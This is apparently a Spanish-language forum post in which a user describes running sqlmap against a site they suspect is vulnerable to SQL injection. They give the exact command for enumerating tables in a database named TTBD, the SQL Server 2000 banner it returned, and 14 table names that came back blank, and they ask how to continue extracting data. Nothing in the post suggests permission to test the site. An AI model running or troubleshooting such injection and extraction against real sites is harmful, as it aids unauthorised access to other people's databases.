Buenas, les comento mi situación. Estoy analizando un site que podría ser vulnerable a Sql injection, utilizo Sqlmap y logro ver una DB, luego quiero extraer las Tablas y me dice que tiene 14 tablas pero me aparecen todas vacías y no puedo continuar:
Ejecuto esto:
sudo ./sqlmap.py -u "http://www.SITEVULNERABLE.com/noticias_ampliar.asp?id=579" --tables -D TTBD
y me salen las 14 tablas vacías....
banner:
---
Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
current database: 'TTBD'
Database: TTBD
[14 tables]
+--+
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
+--+